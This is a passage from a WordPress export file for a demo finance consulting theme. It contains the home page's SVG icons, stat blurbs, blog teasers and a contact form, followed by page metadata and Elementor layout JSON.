</svg>        	
        	<p>Businesses Guided <br>Over Thirty Years</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M260.981,445.576H65.171c-12.354,0-22.405-10.051-22.405-22.405V91.202c0-4.143-3.357-7.5-7.5-7.5s-7.5,3.357-7.5,7.5   v331.969c0,20.625,16.78,37.405,37.405,37.405h195.81c4.143,0,7.5-3.357,7.5-7.5S265.124,445.576,260.981,445.576z"></path>
	<path d="M35.266,68.701c4.143,0,7.5-3.357,7.5-7.5V37.405C42.766,25.051,52.817,15,65.171,15h283.655   c12.354,0,22.405,10.051,22.405,22.405v121.67c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5V37.405   C386.232,16.78,369.452,0,348.827,0H65.171C44.546,0,27.766,16.78,27.766,37.405v23.796C27.766,65.344,31.124,68.701,35.266,68.701   z"></path>
	<path d="M301.033,102.805c12.924,0,23.438-10.515,23.438-23.438s-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,5.101,1.643,9.823,4.421,13.675l-36.844,51.487c-2.162-0.66-4.454-1.017-6.828-1.017c-5.982,0-11.444,2.255-15.59,5.957   l-24.089-13.669c0.278-1.44,0.428-2.925,0.428-4.444c0-12.924-10.514-23.438-23.438-23.438s-23.438,10.514-23.438,23.438   c0,1.52,0.15,3.004,0.428,4.444l-24.089,13.669c-4.146-3.701-9.609-5.956-15.59-5.956c-12.924,0-23.438,10.514-23.438,23.438   s10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-1.52-0.15-3.004-0.428-4.444l24.089-13.669   c4.146,3.701,9.609,5.956,15.59,5.956c5.981,0,11.444-2.255,15.59-5.956l24.089,13.669c-0.278,1.44-0.428,2.924-0.428,4.444   c0,12.924,10.514,23.438,23.438,23.438s23.438-10.514,23.438-23.438c0-5.102-1.644-9.824-4.422-13.677l36.843-51.485   C296.365,102.447,298.657,102.805,301.033,102.805z M112.965,175.386c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438   c4.653,0,8.438,3.785,8.438,8.438S117.619,175.386,112.965,175.386z M175.655,139.791c-4.653,0-8.438-3.785-8.438-8.438   s3.785-8.438,8.438-8.438c4.652,0,8.438,3.785,8.438,8.438S180.307,139.791,175.655,139.791z M238.343,175.386   c-4.652,0-8.438-3.785-8.438-8.438s3.785-8.438,8.438-8.438c4.653,0,8.438,3.785,8.438,8.438S242.997,175.386,238.343,175.386z    M301.033,70.929c4.652,0,8.438,3.785,8.438,8.438c0,4.653-3.785,8.438-8.438,8.438c-4.653,0-8.438-3.785-8.438-8.438   C292.594,74.714,296.379,70.929,301.033,70.929z"></path>
	<path d="M275.355,285.43H89.279c-4.143,0-7.5,3.357-7.5,7.5s3.357,7.5,7.5,7.5h186.076c4.143,0,7.5-3.357,7.5-7.5   S279.498,285.43,275.355,285.43z"></path>
	<path d="M81.779,378.157c0,4.143,3.357,7.5,7.5,7.5h202.743c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5H89.279   C85.136,370.657,81.779,374.015,81.779,378.157z"></path>
	<path d="M430.511,325.202c14.881-10.362,26.219-24.74,32.788-41.58c0.119-0.305,0.214-0.616,0.292-0.929   c3.833-10.075,5.909-20.904,5.909-32.037v-15.287h7.234c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H280.729   c-4.143,0-7.5,3.357-7.5,7.5v38.796c0,4.143,3.357,7.5,7.5,7.5h7.234v15.287c0,11.133,2.076,21.962,5.909,32.037   c0.077,0.313,0.172,0.624,0.292,0.929c6.569,16.84,17.907,31.218,32.788,41.58c4.754,3.311,9.768,6.134,14.981,8.452v26.281   c-32.488,14.441-53.97,47.146-53.97,82.98v15.288h-7.234c-4.143,0-7.5,3.357-7.5,7.5V504.5c0,4.143,3.357,7.5,7.5,7.5h196.005   c4.143,0,7.5-3.357,7.5-7.5v-38.796c0-4.143-3.357-7.5-7.5-7.5H469.5v-15.288c0-15.772-4.111-31.31-11.891-44.933   c-2.054-3.597-6.635-4.847-10.231-2.794c-3.598,2.054-4.849,6.635-2.794,10.231c6.487,11.361,9.916,24.327,9.916,37.495v15.287   h-17.747l-31.201-37.851c-6.508-7.896-16.109-12.451-26.342-12.499c-0.055,0-0.106,0-0.161,0c-10.172,0-19.749,4.461-26.295,12.254   l-32.001,38.096h-17.789v-15.287c0-31.381,19.735-59.886,49.109-70.932c2.924-1.1,4.86-3.896,4.86-7.021v-26.187   c4.675,1.152,9.451,1.938,14.299,2.333v18.77c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-18.77   c4.847-0.396,9.623-1.182,14.298-2.333v26.187c0,3.124,1.937,5.92,4.86,7.02c7.89,2.968,15.194,7.215,21.71,12.623   c3.187,2.646,7.916,2.207,10.561-0.98c2.646-3.187,2.207-7.915-0.98-10.561c-6.448-5.354-13.544-9.757-21.15-13.132v-26.279   C420.744,331.336,425.757,328.513,430.511,325.202z M364.24,429.755c3.688-4.39,9.08-6.901,14.81-6.901c0.03,0,0.061,0,0.091,0   c5.763,0.026,11.171,2.593,14.837,7.04l23.336,28.31h-76.971L364.24,429.755z M469.234,473.204V497H288.229v-23.796H469.234z    M288.229,220.369v-23.796h181.005v23.796H462H295.463H288.229z M405.39,321.588c-0.194,0.073-0.372,0.172-0.557,0.26   c-8.184,2.976-16.983,4.577-26.101,4.577c-9.119,0-17.92-1.602-26.105-4.578c-0.184-0.087-0.361-0.186-0.554-0.259   c-16.736-6.293-30.335-18.26-38.946-33.191h21.454c4.143,0,7.5-3.357,7.5-7.5s-3.357-7.5-7.5-7.5h-28.083   c-2.303-7.25-3.534-14.905-3.534-22.74v-15.287H454.5v15.287c0,7.835-1.231,15.491-3.534,22.74H364.58c-4.143,0-7.5,3.357-7.5,7.5   s3.357,7.5,7.5,7.5h79.757C435.726,303.328,422.126,315.294,405.39,321.588z"></path>
	<path d="M378.732,378.377c-4.143,0-7.5,3.357-7.5,7.5v3.478c0,4.143,3.357,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-3.478   C386.232,381.734,382.875,378.377,378.732,378.377z"></path>
</g>
</svg>        	
        	<p>Finished & Supported <br>Incredible Projects</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M337.392,377.361c-3.438,2.311-4.352,6.971-2.041,10.408c1.447,2.154,3.817,3.317,6.231,3.317   c1.438,0,2.894-0.414,4.177-1.276c16.269-10.935,30.137-24.531,41.213-39.984c0.12-0.155,0.237-0.313,0.345-0.477   c19.123-26.889,29.79-59.369,29.79-93.349c0-34.475-10.889-66.451-29.401-92.682c-0.337-0.65-0.765-1.244-1.269-1.765   c-29.308-40.366-76.859-66.669-130.446-66.669c-23.574,0-46.297,4.979-67.537,14.798c-3.76,1.738-5.398,6.195-3.66,9.955   c1.737,3.759,6.194,5.399,9.955,3.66c9.401-4.346,19.125-7.638,29.104-9.877c-6.338,7.999-12.09,18.475-17.049,31.242   c-1.8,4.635-3.459,9.528-5.004,14.602h-55.278c6.863-7.762,14.532-14.819,22.869-20.963c3.334-2.458,4.045-7.153,1.588-10.487   c-2.458-3.334-7.153-4.044-10.487-1.588c-13.521,9.966-25.468,22.09-35.293,35.709c-0.237,0.281-0.449,0.582-0.643,0.896   c-4.379,6.158-8.331,12.614-11.792,19.313c-11.704,22.652-17.89,48.192-17.89,73.858c0,34.476,10.89,66.453,29.403,92.684   c0.336,0.648,0.763,1.24,1.266,1.76c29.308,40.368,76.86,66.672,130.448,66.672c21.485,0,42.351-4.162,62.017-12.371   c3.823-1.596,5.628-5.988,4.032-9.811c-1.595-3.822-5.99-5.626-9.81-4.032c-7.837,3.271-15.886,5.832-24.102,7.677   c6.338-7.999,12.089-18.475,17.048-31.24c1.801-4.635,3.46-9.528,5.005-14.602h55.316   C357.316,361.992,347.91,370.292,337.392,377.361z M365.396,159.263h-30.918c-4.143,0-7.5,3.358-7.5,7.5s3.357,7.5,7.5,7.5h42.572   c14.497,21.403,23.475,46.836,24.867,74.237h-78.825c-0.715-39.135-7.01-75.766-17.916-103.839   c-4.951-12.745-10.692-23.208-17.018-31.202C318.567,120.318,345.411,136.686,365.396,159.263z M203.888,263.5h104.203   c-0.528,28.173-4.011,53.335-9.326,74.237h-85.586C207.61,315.734,204.393,290.293,203.888,263.5z M203.89,248.5   c0.528-28.173,4.011-53.335,9.326-74.237h85.586c5.569,22.003,8.786,47.444,9.291,74.237H203.89z M255.991,109.883   c12.446,0,25.277,14.656,35.204,40.209c1.145,2.948,2.224,6.023,3.26,9.17h-76.878   C227.822,128.263,242.336,109.883,255.991,109.883z M126.09,189.027c2.628-5.086,5.568-10.016,8.784-14.765h62.867   c-5.312,22.341-8.368,47.708-8.852,74.237h-78.817C111.109,227.612,116.475,207.637,126.09,189.027z M146.584,352.737h30.074   c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-41.727c-14.498-21.403-23.475-46.836-24.867-74.237h78.825   c0.715,39.135,7.01,75.766,17.915,103.839c4.951,12.745,10.692,23.208,17.018,31.202   C193.413,391.682,166.57,375.314,146.584,352.737z M255.991,402.117c-12.446,0-25.278-14.656-35.204-40.209   c-1.145-2.948-2.224-6.023-3.26-9.17h76.878C284.159,383.737,269.645,402.117,255.991,402.117z M314.24,337.737   c5.312-22.341,8.368-47.709,8.852-74.237h78.807c-1.373,26.87-10.084,52.455-24.791,74.237H314.24z"></path>
	<path d="M414.428,113.042L300.576,47.313c-3.589-2.072-8.175-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.852,65.729c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C419.244,119.7,418.015,115.113,414.428,113.042z"></path>
	<path d="M67.967,321.706V190.294c0-4.142-3.358-7.5-7.5-7.5s-7.5,3.358-7.5,7.5v131.412c0,4.142,3.358,7.5,7.5,7.5   S67.967,325.848,67.967,321.706z"></path>
	<path d="M406.905,385.979l-113.828,65.718c-3.587,2.071-4.816,6.658-2.745,10.245c1.389,2.406,3.91,3.751,6.502,3.751   c1.272,0,2.563-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   C415.079,385.137,410.491,383.907,406.905,385.979z"></path>
	<path d="M444.014,190.294v131.412c0,4.142,3.357,7.5,7.5,7.5s7.5-3.358,7.5-7.5V190.294c0-4.142-3.357-7.5-7.5-7.5   S444.014,186.152,444.014,190.294z"></path>
	<path d="M218.904,451.697l-113.851-65.729c-3.587-2.072-8.174-0.842-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l113.851,65.729c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.346,6.502-3.751   C223.72,458.354,222.491,453.768,218.904,451.697z"></path>
	<path d="M101.333,127.027c1.272,0,2.562-0.324,3.743-1.006l113.828-65.718c3.587-2.071,4.816-6.658,2.745-10.245   c-2.072-3.587-6.658-4.816-10.245-2.745L97.576,113.031c-3.587,2.071-4.816,6.658-2.745,10.245   C96.22,125.682,98.741,127.027,101.333,127.027z"></path>
	<path d="M255.991,60.46c16.669,0,30.23-13.561,30.23-30.23S272.659,0,255.991,0s-30.23,13.562-30.23,30.23   S239.322,60.46,255.991,60.46z M255.991,15c8.398,0,15.23,6.833,15.23,15.23s-6.832,15.23-15.23,15.23   c-8.398,0-15.23-6.832-15.23-15.23S247.593,15,255.991,15z"></path>
	<path d="M75.583,116.935C61.149,108.6,42.623,113.564,34.288,128c-8.334,14.436-3.371,32.961,11.065,41.295   c4.749,2.742,9.938,4.044,15.064,4.044c10.455,0,20.638-5.422,26.231-15.109C94.983,143.794,90.019,125.27,75.583,116.935z    M73.658,150.73c-4.2,7.272-13.532,9.773-20.805,5.575c-7.272-4.199-9.773-13.532-5.575-20.805   c2.034-3.523,5.318-6.043,9.248-7.096s8.034-0.513,11.557,1.521C75.356,134.125,77.857,143.458,73.658,150.73z"></path>
	<path d="M45.353,342.705C30.917,351.039,25.953,369.564,34.288,384c5.593,9.688,15.775,15.109,26.231,15.109   c5.125,0,10.316-1.303,15.064-4.044c14.436-8.334,19.399-26.859,11.065-41.295C78.313,339.333,59.787,334.371,45.353,342.705z    M68.083,382.075c-3.523,2.034-7.629,2.574-11.557,1.521c-3.93-1.053-7.214-3.573-9.248-7.096   c-4.199-7.273-1.698-16.606,5.575-20.805c7.273-4.2,16.605-1.698,20.805,5.575C77.857,368.542,75.356,377.875,68.083,382.075z"></path>
	<path d="M255.991,451.54c-16.669,0-30.23,13.561-30.23,30.23S239.322,512,255.991,512s30.23-13.562,30.23-30.23   S272.659,451.54,255.991,451.54z M255.991,497c-8.398,0-15.23-6.833-15.23-15.23s6.833-15.23,15.23-15.23   c8.398,0,15.23,6.832,15.23,15.23S264.389,497,255.991,497z"></path>
	<path d="M466.628,342.705c-14.435-8.333-32.96-3.371-41.296,11.065c-8.334,14.436-3.37,32.961,11.065,41.295   c4.658,2.689,9.827,4.063,15.066,4.063c2.625,0,5.27-0.345,7.873-1.043c7.8-2.09,14.318-7.092,18.355-14.084   c4.038-6.993,5.11-15.14,3.021-22.94C478.623,353.261,473.621,346.742,466.628,342.705z M464.702,376.5L464.702,376.5   c-2.034,3.523-5.318,6.044-9.248,7.097c-3.929,1.053-8.034,0.513-11.557-1.521c-7.272-4.199-9.773-13.532-5.575-20.805   c2.818-4.881,7.948-7.612,13.216-7.612c2.582,0,5.197,0.656,7.59,2.037c3.522,2.034,6.043,5.318,7.096,9.248   S466.737,372.977,464.702,376.5z"></path>
	<path d="M451.564,173.339c5.125,0,10.316-1.303,15.064-4.044c6.993-4.038,11.995-10.557,14.085-18.356   c2.09-7.8,1.018-15.947-3.021-22.94v0c-4.037-6.993-10.556-11.995-18.355-14.085c-7.8-2.089-15.946-1.018-22.939,3.02   c-14.436,8.334-19.399,26.859-11.065,41.296C430.926,167.918,441.108,173.34,451.564,173.339z M443.898,129.925   c2.347-1.355,4.951-2.047,7.591-2.047c1.322,0,2.654,0.174,3.966,0.525c3.93,1.053,7.214,3.573,9.248,7.096v0   c2.034,3.522,2.574,7.627,1.521,11.557s-3.573,7.214-7.096,9.248c-7.271,4.199-16.604,1.698-20.806-5.574   C434.124,143.458,436.625,134.124,443.898,129.925z"></path>
</g>
</svg>        	
        		+        	
        	<p>Years of Experience <br>& Business Consulting</p>      				        
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 470 470"><g><path d="m429.591,418.378l-62.223-150.218c-1.585-3.826-5.972-5.645-9.799-4.059s-5.645,5.973-4.059,9.799l56.251,135.801-51.309-14.867c-3.368-0.977-6.965,0.513-8.656,3.586l-25.769,46.793-60.357-145.716c69.663-13.434 122.447-74.853 122.447-148.378 0.001-83.327-67.79-151.119-151.117-151.119s-151.119,67.792-151.119,151.119c0,33.751 11.124,64.951 29.896,90.133l-73.368,177.126c-1.103,2.664-0.582,5.724 1.341,7.872 1.922,2.148 4.907,3.004 7.676,2.202l60.533-17.541 30.4,55.207c1.324,2.403 3.847,3.882 6.568,3.882 0.138,0 0.277-0.004 0.416-0.011 2.879-0.16 5.411-1.955 6.515-4.619l58.136-140.353c1.585-3.827-0.232-8.214-4.059-9.799-3.827-1.585-8.214,0.232-9.799,4.059l-52.165,125.936-25.767-46.793c-1.692-3.073-5.291-4.563-8.657-3.586l-51.308,14.867 64.397-155.469c27.598,29.52 66.86,48.005 110.364,48.005 4.491,0 8.933-0.209 13.325-0.594l67.818,163.727c1.103,2.664 3.636,4.459 6.514,4.618 0.14,0.008 0.278,0.012 0.417,0.012 2.721,0 5.244-1.479 6.567-3.882l30.401-55.207 60.533,17.541c2.771,0.803 5.753-0.054 7.676-2.202 1.923-2.148 2.443-5.208 1.34-7.872zm-330.71-267.259c2.84217e-14-75.056 61.063-136.119 136.119-136.119 75.056,0 136.118,61.063 136.118,136.119s-61.062,136.118-136.118,136.118c-75.056,0-136.119-61.062-136.119-136.118z"></path><path d="m321.659,122.961c-0.863-2.658-3.135-4.616-5.892-5.079l-50.467-8.469-23.649-45.379c-1.292-2.479-3.855-4.034-6.651-4.034-2.795,0-5.359,1.555-6.651,4.034l-23.65,45.379-50.466,8.469c-2.757,0.462-5.028,2.42-5.892,5.079-0.864,2.659-0.178,5.577 1.781,7.572l35.85,36.515-7.54,50.614c-0.412,2.765 0.748,5.529 3.01,7.173 2.26,1.642 5.249,1.891 7.751,0.646l45.807-22.812 45.806,22.812c1.059,0.527 2.203,0.787 3.343,0.787 1.557,0 3.104-0.484 4.409-1.432 2.262-1.644 3.422-4.408 3.01-7.173l-7.539-50.614 35.85-36.516c1.958-1.995 2.644-4.913 1.78-7.572zm-50.951,36.244c-1.648,1.679-2.413,4.033-2.066,6.359l5.97,40.074-36.268-18.061c-1.054-0.524-2.198-0.787-3.344-0.787-1.145,0-2.291,0.262-3.343,0.787l-36.268,18.061 5.97-40.074c0.347-2.326-0.418-4.681-2.066-6.359l-28.385-28.912 39.957-6.706c2.32-0.389 4.323-1.844 5.41-3.93l18.725-35.929 18.725,35.93c1.088,2.086 3.09,3.541 5.41,3.93l39.958,6.706-28.385,28.911z"></path><path d="m348.612,158.684c-4.107-0.549-7.877,2.343-8.42,6.45-6.957,52.507-52.18,92.104-105.192,92.104-58.514,0-106.119-47.604-106.119-106.119s47.605-106.119 106.119-106.119c53.013,0 98.235,39.596 105.192,92.104 0.543,4.107 4.32,7.001 8.42,6.45 4.105-0.544 6.994-4.314 6.449-8.42-7.94-59.936-59.555-105.134-120.061-105.134-66.785,0-121.119,54.333-121.119,121.119s54.334,121.118 121.119,121.118c60.506,0 112.121-45.198 120.062-105.134 0.544-4.105-2.344-7.875-6.45-8.419z"></path></g></svg>        	
        		+        	
        	<p>Business Excellence <br>Awards Achieved</p>      				        
	        business blog	        <h2>Read Our Latest Insights</h2>	    
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/blog/">view all</a>
					<article id="post-447">
									<a href="http://wpdemo.archiwp.com/maxbizz-finance/category/business/" rel="category tag">business</a>									<a href="http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/blog-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/" rel="bookmark">Contactless Payments’ Time Has Come</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/" rel="bookmark"><time datetime="2020-09-04T09:09:22+00:00">September 4, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/"></a>
					</article>
					<article id="post-430">
									<a href="http://wpdemo.archiwp.com/maxbizz-finance/category/business/" rel="category tag">business</a> <a href="http://wpdemo.archiwp.com/maxbizz-finance/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/" rel="bookmark">The Future of Retail: Asia’s Ecosystems</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/" rel="bookmark"><time datetime="2020-02-24T09:00:43+00:00">February 24, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-finance/the-future-of-retail-asias-ecosystems/"></a>
					</article>
					<article id="post-434">
									<a href="http://wpdemo.archiwp.com/maxbizz-finance/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-2-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/" rel="bookmark">Digital Transformation Roadmap: Enablers</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/" rel="bookmark"><time datetime="2019-08-14T09:02:49+00:00">August 14, 2019</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-finance/digital-transformation-roadmap-enablers/"></a>
					</article>
										<img width="522" height="660" src="https://maxbizz.s3.amazonaws.com/images/image2-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image2-home5.png 522w, https://maxbizz.s3.amazonaws.com/images/image2-home5-237x300.png 237w" sizes="(max-width: 522px) 100vw, 522px" />											
	        TO BECOME A CLIENT	        <h3>Ready to Get Started?</h3>	    
		<p>Please, fulfill the form to get a consultation. After processing the data, a personal manager will contact you.</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f4-o2" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="4" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f4-o2" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-phone" value="" size="40" aria-invalid="false" placeholder="Your Phone *" /></p>
<p><input type="text" name="your-subject" value="" size="40" aria-invalid="false" placeholder="Subject *" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">submit now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1023</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:28:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:28:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8f25ccb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-banner-home5.jpg","id":2159},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"0e54267","elType":"column","settings":{"_column_size":66,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"b9492b4","elType":"widget","settings":{"title":"professional consultations","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c48d4d5","elType":"widget","settings":{"title":"Finance Planning, Execution & Strategy\n","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Prata","typography_font_size":{"unit":"px","size":60,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2b5261d","elType":"widget","settings":{"editor":"<p>We are boutique firm designed for Private Equity, Family Offices, and<br \/>Growth-Stage Companies seeking to maximize results<\/p>","text_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":18,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"afe22c6","elType":"widget","settings":{"align":"flex-start","caption":"how we work","btn_width":{"unit":"px","size":80,"sizes":[]},"btn_width_mobile":{"unit":"px","size":60,"sizes":[]},"btn_color":"#FFFFFF","btn_border_color":"#52C5B6","btn_bg":"#52C5B6","btn_circle":"#FFFFFF4D","caption_color":"#FFFFFF","_z_index":1,"vlink":"https:\/\/vimeo.com\/87959439"},"elements":[],"widgetType":"ivideopopup"}],"isInner":false},{"id":"36c4b76","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ec41100","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"45","right":"30","bottom":"40","left":"30","isLinked":false}},"elements":[{"id":"ff41853","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"33f91f9","elType":"widget","settings":{"title":"Get Free Quote","align":"center","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":24,"sizes":[]},"typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"633868d","elType":"widget","settings":{"editor":"It's our pleasure to have a chance to cooperate.","align":"center","text_color":"#5F5F5F","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"79f3d28","elType":"widget","settings":{"cf7":"1536","css_input_submit":"width: 